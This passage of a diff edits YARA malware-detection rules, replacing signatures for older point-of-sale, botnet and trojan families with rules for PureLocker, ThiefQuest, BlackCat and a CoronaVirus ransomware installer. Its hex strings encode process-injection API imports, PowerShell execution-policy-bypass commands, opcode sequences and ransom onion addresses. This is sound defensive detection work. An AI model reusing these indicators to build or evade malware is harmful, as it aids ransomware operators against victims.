+		$api6 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 6c 6f 73 65 48 61 6e 64 6c 65 22 29 5d }
+		$api7 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 41 6c 6c 6f 63 45 78 22 29 5d }
+		$api8 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 3d 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 45 78 22 29 5d }
+		$api9 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 20 53 65 74 4c 61 73 74 45 72 72 6f 72 20 3d 20 74 72 75 65 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 4f 70 65 6e 50 72 6f 63 65 73 73 22 29 5d }
+		$api10 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d }
+		$artifact0 = { 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 2c 45 6e 74 72 79 50 6f 69 6e 74 20 3d 20 22 43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 22 29 5d }
+		$artifact1 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 50 74 72 54 6f 53 74 72 75 63 74 75 72 65 }
+		$artifact2 = { 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 52 65 61 64 49 6e 74 31 36 }
+		$artifact3 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73}
+		$artifact4 = { 65 6e 76 3a 57 49 4e 44 49 52 5c 73 79 73 77 6f 77 36 34 5c 77 69 6e 64 6f 77 73 70 6f 77 65 72 73 68 65 6c 6c 5c 76 31 2e 30 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 65 78 65 63 20 62 79 70 61 73 73 20 2d 66 69 6c 65}
+		$artifact5 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 30 20 2c 20 4d 61 6e 64 61 74 6f 72 79}
+		$artifact6 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 31 20 2c 20 4d 61 6e 64 61 74 6f 72 79}
+		$artifact7 = {2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 50 61 73 73 20 2d 4e 6f 4c 6f 67 6f 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 4e 6f 45 78 69 74}
+		$artifact8 = {72 65 74 75 72 6e 20 5b 42 69 74 43 6f 6e 76 65 72 74 65 72 5d 3a 3a 54 6f 49 6e 74 36 34}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and any of them
+		6 of ( $api* ) or ( ( 3 of ( $artifact* ) ) )
 }
-rule TRELLIX_ARC_MALWARE_Blackpos_Pdb : POS FILE
+rule TRELLIX_ARC_Purelocker_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "BlackPOS PDB"
+		description = "Rule to detect PureLocker ransomware based on binary sequences"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "f37e1522-49c4-5369-bc2c-33b070e9eae7"
-		date = "2014-01-24"
+		id = "3d945869-9faa-59de-add6-d664a7beef6f"
+		date = "2019-11-13"
 		modified = "2020-08-14"
-		reference = "https://en.wikipedia.org/wiki/BlackPOS_Malware"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_blackpos_pdb.yar#L1-L25"
+		reference = "https://www.pandasecurity.com/mediacenter/security/purelocker-ransomware-servers/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_PureLocker.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5a963e8aca62f3cf5872c6bff02d6dee0399728554c6ac3f5cb312b2ba7d7dbf"
-		logic_hash = "d8f3fa380ca15f0fae432849b8c16cb8a0a9d1427d3e72fbf89cbbd63b0849c9"
+		logic_hash = "9f39f0ef922023a79919f5b41a7acda6c08373af8f5fd2d4c4dcaca6146970ea"
 		score = 75
 		quality = 70
-		tags = "POS, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "pos"
-		malware_family = "Pos:W32/BlackPos"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/PureLocker"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Projects\\Rescator\\MmonNew\\Debug\\mmon.pdb"
+		$sequence = { 31??FF????E8????????83????5BC2????555357BA????????83????C7????????????4A75??E8????????8B????????????8D????E8????????8B????????????8D??????E8????????FF????8D??????????59E8????????75??FF??????8D??????????59E8????????75??EB??B8????????EB??31??21??74??31??0FBE??E9????????8D??????C7????????????C7????????????66??????????FF??????E8????????89??????52E8????????5A5052E8????????5A50FF??????E8????????8D????????????50E8????????8B??????01??89??????8B??????83????53E8????????89??????8B??????21??75??31??0FBE??E9????????68????????68????????FF????????????FF??????E8????????FF????E8????????89??01??89????????????8B????????????83????53E8????????89????????????8B????????????21??75??FF??????E8????????31??0FBE??E9????????68????????68????????FF??????FF????????????E8????????0FBE??????????83????0F85????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????FF??????E8????????68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF????????????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????FF????E8????????8D??????FF????E8????????FF????????????E8????????FF????????????E8????????B8????????0FBE??E9????????EB??68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF??????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????508D??????FF????E8????????89????????????FF??????E8????????C7??????????????FF????????????E8????????C7????????????????????C7????????????????????8B????????????21??74??E9????????0FBE????????????83????75??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????EB??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????8B??????21??74??E9????????0FBE????????????83????75??8D????????????8D????FF????FF??8F??????8F??????EB??8D????????????8B????9952508F??????8F??????FF??????FF??????5B5F83????7F??7C??83????77??31??EB??B8????????09??75??E9????????0FBE????????????83????75??68????????E8????????89????????????8B????????????21??75??E9????????68????????68????????68????????FF????????????FF????????????FF????????????8D??????FF????E8????????89????????????EB??68????????E8????????89??????8B??????21??75??E9????????68????????68????????FF??????8B????????????508D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????FF????FF??5B5F83????75??83????74??31??EB??B8????????09??74??E9????????EB??8B??????21??75??E9????????8B??????8B????21??75??E9????????0FBE????????????83????75??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????68????????FF????????????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????FF????????????FF????????????8B????????????FF????8D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??7E??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??8B??????21??7E??68????????68????????FF??????E8????????FF??????E8????????C7??????????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????EB??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????0FBE????????????83????75??68????????68????????FF??????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??68????????FF??????FF????????????8B????????????FF????8D??????FF????E8????????89????????????FF????????????E8????????C7????????????????????0FBE????????????83????75??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????8B????????????21??74??EB??68????????8D??????FF????E8????????89????????????8B????????????21??74??EB??0FBE????????????83????75??68????????31??508D??????FF????E8????????C6????????8D??????FF????E8????????8D??????FF????E8????????0FBE??????0FBE??E9????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B??????21??7E??FF??????E8????????8B????????????21??7E??FF????????????E8????????8D??????8B????21??7E??68????????8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????31??0FBE??EB??31??FF????E8????????FF????????????E8????????FF??????E8????????81??????????5F5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????83????????????0F84????????FF????E8????????89??01??89??????8B??????83????53E8????????89??????83????????74??68????????68????????FF??????FF??????E8????????89??3B??????75??8B??????83????538D??????5866??????FF??????5866??????FF??????5889????FF??????????5889??????8D??????508D??????5068????????68????????FF??????89??21??75??FF??????5889??????FF??????E8????????8B??????EB??31??FF????E8????????83????5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??5050E8????????FF??????E8????????52E8????????5A50FF??????????8D??????????50E8????????8D??????50E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????8D??????50E8????????FF????8D??????????59E8????????74??52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????588B??????52E8????????8D??????50E8????????EB??8B????52E8????????5A5052E8????????8B??????52E8????????8D??????50E8????????8B????52E8????????5A5052E8????????5850E8????????5A01??EB??E8????????66????????FF????E8????????FF??????E8????????83????C331??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????555331??50505050E8????????C7??????????????FF??????E8????????89????8B????21??75??31??EB??8D??????50FF??????FF??????68????????E8????????89??21??75??8B????FF????5889??????68????????68????????FF??????E8????????FF????E8????????8B??????EB??31??83????5B5DC35331??50505050E8????????8B??????8D????E8????????FF????E8????????89??????8B??????83????53E8????????89??????83????????74??68????????FF??????FF??????FF??????E8????????21??74??FF??????FF??????68????????E8????????89??F7??89??????FF??????E8????????8B??????EB??31??FF????E8????????83????5BC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????FF????8D??????????59E8????????74??31??E9????????52E8????????5A50FF??????????8D??????????50E8????????8B??????52E8????????8D??????50E8????????FF??????E8????????89??01??89??????8B??????83????53E8????????89??????83????????0F84????????68????????68????????FF??????FF??????E8????????89??3B??????0F85????????FF??????8D??????5866??????8B??????83????535866??????FF??????5889????C7??????????????8D??????????8D??????E8????????8D??????C7????????????C7????????????8D??????505889????68????????68????????8D??????508D??????5068????????8D??????50E8????????89??21??75??8B??????21??7E??B8????????EB??31??21??74??FF??????E8????????C7??????????????68????????68????????8D??????508D??????50FF??????E8????????89??21??75??8D??????FF????5889??????FF??????E8????????8B??????21??7E??FF??????E8????????8B??????EB??31??FF??????E8????????FF????E8????????83????5B5DC2????555357BA????????83????C7???????????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule TRELLIX_ARC_MALW_Fritzfrog : BOTNET FILE
+rule TRELLIX_ARC_MALW_Thiefquest : KEYLOGGER BACKDOOR RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Fritzfrog"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "4c553279-7e0c-5602-944d-ad8a47edf4ea"
-		date = "2020-08-20"
-		modified = "2020-08-20"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_fritzfrog.yar#L1-L26"
+		description = "Rule to detect the Evilquest/ThiefQuest malware"
+		author = "McAfee ATR Team"
+		id = "09b074f7-6899-574d-a7d6-4414509aaa78"
+		date = "2020-07-09"
+		modified = "2020-10-12"
+		reference = "https://www.bleepingcomputer.com/news/security/thiefquest-ransomware-is-a-file-stealing-mac-wiper-in-disguise/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_thiefquest.yar#L1-L46"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "488c807ecf0a9e981b2c1f2f5bb2e3072952d11f7cbf3a354bc85dc8e88b8b09"
+		hash = "5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b"
+		logic_hash = "d40a466b12188d545d3fbe2c9d7e3685dde1250ae1f25df2a72cdf93c470ae25"
 		score = 75
-		quality = 70
-		tags = "BOTNET, FILE"
+		quality = 68
+		tags = "KEYLOGGER, BACKDOOR, RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "botnet"
-		malware_family = "Botnet:W32/Fritzfrog"
-		actor_type = "Cybercrime"
-		hash1 = "103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046"
+		malware_type = "keylogger, backdoor, ransomware"
 		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		malware_family = "Ransom:OSX/ThiefQuest"
 
 	strings:
-		$pattern = { 7F454C4602010100000000000000000002003E000100000090D34500000000004000000000000000C8010000000000000000000040003800070040000D000300060000000400000040000000000000004000400000000000400040000000000088010000000000008801000000000000001000000000000004000000040000009C0F0000000000009C0F4000000000009C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000083F23E000000000083F23E00000000000010000000000000010000000400000000003F000000000000007F000000000000007F00000000006C834500000000006C834500000000000010000000000000010000000600000000908400000000000090C400000000000090C4000000000060EC0400000000005809070000000000001000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000006000000000000000010400000000000001000000000000083E23E00000000000000000000000000100000000000000000000000000000004100000001000000020000000000000000007F000000000000003F0000000000C0271B0000000000000000000000000020000000000000000000000000000000720000000300000000000000000000000000000000000000C0275A00000000007C000000000000000000000000000000010000000000000000000000000000004900000001000000020000000000000040289A000000000040285A0000000000D83600000000000000000000000000002000000000000000000000000000000053000000010000000200000000000000185F9A0000000000185F5A0000000000380D0000000000000000000000000000080000000000000000000000000000005D000000010000000200000000000000506C9A0000000000506C5A0000000000000000000000000000000000000000000100000000000000000000000000000067000000010000000200000000000000606C9A0000000000606C5A00000000000C172A0000000000000000000000000020000000000000000000000000000000070000000100000003000000000000000090C400000000000090840000000000004B0300000000000000000000000000200000000000000000000000000000001200000001000000030000000000000000DBC7000000000000DB87000000000050A101000000000000000000000000002000000000000000000000000000000018000000080000000300000000000000607CC90000000000607C890000000000D0E80100000000000000000000000000200000000000000000000000000000001D0000000800000003000000000000004065CB000000000040658B00000000001834000000000000000000000000000020000000000000000000000000000000270000000700000002000000000000009C0F4000000000009C0F00000000000064000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 }
+		$pattern_0 = { 01c1 48 83c102 48 }
+		$pattern_1 = { 8c1471 80c1c1 98 1c8c }
+		$pattern_2 = { d8974f0dc89a 9f c9 9adf70cd595390 }
+		$pattern_3 = { d897c56f028c 2393a0a42e92 8ea2c27affc2 f8 }
+		$pattern_4 = { 477006 baa6a1cb82 ae f9 e8???????? d8a32bd0d519 }
+		$pattern_5 = { d898ab5c757b 2f f26f 5d }
+		$pattern_6 = { bc007a846b 2b54adaf 93 35eddf38e6 cdd0 b246 }
+		$pattern_7 = { ae 49b00e 01d1 45da611b 44839db656691674 }
+		$pattern_8 = { 01c1 48 83c101 48 }
+		$pattern_9 = { 6be3c6 5c 99 ae ed bf370e2f47 }
+		$pattern_10 = { fd d7 43bd18fd6f06 7937 fa }
+		$pattern_11 = { 01c2 48 83c201 bf01000000 }
+		$pattern_12 = { d89825ed4469 29f1 5c e12d }
+		$pattern_13 = { d8992062f7f9 73ff 90 085fc6 }
+		$pattern_14 = { 01c1 6689ca 668995cefeffff e9???????? }
+		$pattern_15 = { 01c1 41 89c8 44 }
+		$pattern_16 = { d89935c487a7 bcdffa587c be6cadbb3c 185fc4 }
+		$pattern_17 = { 01c1 48 8b75a8 48 }
+		$pattern_18 = { 0000 48 8945f8 e9???????? }
+		$pattern_19 = { d89959d6472d a2???????? 3525c7eec9 95 }
+		$pattern_20 = { 01c2 48 83c203 bf01000000 }
+		$pattern_21 = { 4a7888 ab 23e7 cf 11f3 }
+		$pattern_22 = { d8982fbf222d 49 92 1d25b42bba }
+		$pattern_23 = { e2d7 8437 6b4696d9 92 9d a6 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 26000KB and all of them
+		7 of them and filesize < 124322606
 }
-rule TRELLIX_ARC_Malw_Cutwail_Pdb : BOTNET FILE
+rule TRELLIX_ARC_Ransom_Win_Blackcat : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect cutwail based on the PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "62058ff9-acb5-5f71-b6bb-4c64e51442ba"
-		date = "2008-04-16"
-		modified = "2020-08-14"
-		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/CUTWAIL"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_cutwail.yar#L1-L25"
+		description = "Detecting variants of Windows BlackCat malware"
+		author = " Trellix ATR"
+		id = "65483ffb-6b10-5fd5-8a5f-fc885a5f2e98"
+		date = "2022-01-06"
+		modified = "2022-01-19"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Win_BlackCat_public.yar#L2-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "d702f823eefb50d9ea5b336c638f65a40c2342f8eb88278da60aa8a498c75010"
-		logic_hash = "f53626e6085509ddf9268b69e54a138e64cd5d3fbad119e6e9473179decd7927"
+		logic_hash = "8faad28ab26690221f6e2130c886446615dbd505f76490cfaf999d130d0de6e3"
 		score = 75
 		quality = 70
-		tags = "BOTNET, FILE"
-		rule_version = "v1"
-		malware_type = "botnet"
-		malware_family = "Botnet:W32/Cutwail"
-		actor_type = "Cybercrime"
+		tags = "RANSOMWARE, FILE"
+		malware_type = "Ransomware"
+		detection_name = "Ransom_Win_BlackCat"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\0bulknet\\FLASH\\Release\\flashldr.pdb"
+		$URL1 = "zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide
+		$URL2 = "mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide
+		$API = { 3a 7c d8 3f }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 440KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3500KB and 1 of ( $URL* ) and $API
 }
-rule TRELLIX_ARC_Malw_Mangzamel_Trojan : TROJAN FILE
+rule TRELLIX_ARC_Installer_Coronavirus : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Mangzamel  trojan based on PDB"
+		description = "Rule to detect the Corona Virus Installer"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "ca77180f-6133-5edb-a36b-78bc6f18d80c"
-		date = "2014-06-25"
+		id = "2a224529-bfc7-57ed-91c3-426cae4b7895"
+		date = "2020-03-25"
 		modified = "2020-08-14"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_mangzamel_trojan_pdb.yar#L1-L26"
+		reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_coronavirus.yar#L1-L41"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "4324580ea162a636b7db1efb3a3ba38ce772b7168b4eb3a149df880a47bd72b7"
-		logic_hash = "bab103c671445e0ea916fae290689d30d45021bdca58a495ebd3d6ca9ca55051"
+		hash = "5987a6e42c3412086b7c9067dc25f1aaa659b2b123581899e9df92cb7907a3ed"
+		logic_hash = "26be8bbfbf615967cc2a0e2d4179cd5f444c53f170a681d2ec236244881dc629"
 		score = 75
-		quality = 70
-		tags = "TROJAN, FILE"
+		quality = 62
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Mangzamel"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/CoronaVirus"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\svn\\sys\\binary\\i386\\agony.pdb"
-		$pdb1 = "\\Windows\\i386\\ndisdrv.pdb"
+		$s1 = { 61 63 68 65 6C 6C 69 65 73 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D }
+		$s2 = { 74 6F 6A 65 6E 2E 6D 65 40 67 6D 61 69 6C 2E 63 6F 6D }
+		$s4 = { 77 61 6E 67 63 68 79 7A 40 67 6D 61 69 6C 2E 63 6F 6D }
+		$s5 = { 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 74 00 69 00 70 00 6F 00 73 00 20 00 64 00 65 00 20 00 69 00 6D 00 61 00 67 00 65 00 6E 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 3B 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 77 00 6D 00 66 00 7C 00 4D 00 61 00 70 00 61 00 73 00 20 00 64 00 65 00 20 00 62 00 69 00 74 00 73 00 20 00 28 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 29 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 7C 00 49 00 63 00 6F 00 6E 00 6F 00 73 00 2F 00 63 00 75 00 72 00 73 00 6F 00 72 00 65 00 73 00 20 00 28 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 29 00 7C 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 7C 00 4D 00 65 00 74 00 61 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 29 00 7C 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 7C 00 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 2A 00 29 00 7C 00 2A 00 2E 00 2A 00 7C 00 7C 00 }
